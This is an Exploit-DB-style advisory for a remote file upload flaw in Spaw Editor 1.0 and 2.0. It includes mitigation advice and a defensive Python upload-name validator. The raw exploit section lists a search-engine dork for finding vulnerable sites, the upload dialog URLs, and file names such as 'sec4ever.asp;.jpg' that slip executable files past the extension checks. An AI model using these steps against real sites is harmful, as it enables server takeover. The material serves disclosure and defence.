Vendor: Spaw Editor
Author: Ma3sTr0-Dz
CVSS: 7.5 (HIGH)
Category: Remote File Upload
Product Name: Spaw Editor
Affected Version From: 1
Affected Version To: 2
Patch Exists: NO
Platforms Tested: Windows, Linux
Year: 2010

Spaw Editor v1.0 & 2.0 Remote File Upload

The Spaw Editor versions 1.0 and 2.0 are vulnerable to remote file upload. The exploit allows attackers to upload arbitrary files to the server. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Spaw Editor and apply any available patches. Additionally, ensure proper file upload validation and restrict file types and sizes.
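The two bypass patterns in the advisory below (an executable extension hidden before a ';' or before a second, harmless-looking extension) both defeat checks that only look at the last extension. The following upload-name validator is an added example, not code from Spaw Editor or the advisory; it checks every extension-like segment against an assumed allowlist and replaces the client-supplied name with a server-chosen one.

```python
import re
import secrets

# Assumed policy for a file manager that should only accept images and documents.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Split on '.' and ';' so that "x.jpg.php" and "x.asp;.jpg" are both broken into
# segments that each have to pass the allowlist; older IIS versions truncated a
# name at ';', and PHP handlers key on a trailing ".php".
_SEGMENT_SPLIT = re.compile(r"[.;]")


def validate_upload_name(filename: str) -> bool:
    """Return True only if every extension-like segment of the name is allowed."""
    # Keep only the final path component, whatever separator the client used.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if not base or base in {".", ".."}:
        return False
    # NUL and other control characters can cut the name short in some runtimes.
    if any(ord(ch) < 32 or ch == "\x7f" for ch in base):
        return False
    parts = _SEGMENT_SPLIT.split(base.lower())
    if len(parts) < 2:  # no extension at all
        return False
    stem, segments = parts[0], parts[1:]
    if not stem:  # dot-files such as ".htaccess"
        return False
    # Every segment after the stem, not just the last one, must be on the allowlist.
    return all(seg in ALLOWED_EXTENSIONS for seg in segments)


def safe_stored_name(filename: str) -> str:
    """Map a validated client name to a random server-side name with the same (allowed) extension."""
    if not validate_upload_name(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample names: the two advisory patterns plus a benign one.
    for candidate in ("photo.jpg", "sec4ever.jpg.php", "sec4ever.asp;.jpg"):
        print(f"{candidate!r}: {'accepted' if validate_upload_name(candidate) else 'rejected'}")
```

Name checks alone still leave a gap: store uploads under a directory where script execution is disabled and serve them with a fixed Content-Type.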

Exploit-DB raw data:

# Title: Spaw Editor v1.0 & 2.0 Remote File Upload .

# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2] 
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]

# Vulnerability: Remote File Upload .

# Part ExplOit & Bug Codes :

Dork [ allinurl:spaw2/dialogs/ ]

Exploit :

For Windows & ASP Sites : 

/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images

/spaw2/uploads/files/sec4ever.asp;.jpg

=====================================

For Linux PHP :

/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files

/spaw2/uploads/files/sec4ever.jpg.php

=====================================

Special Thanks to : Exploit-db Team & Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits & Localz ] .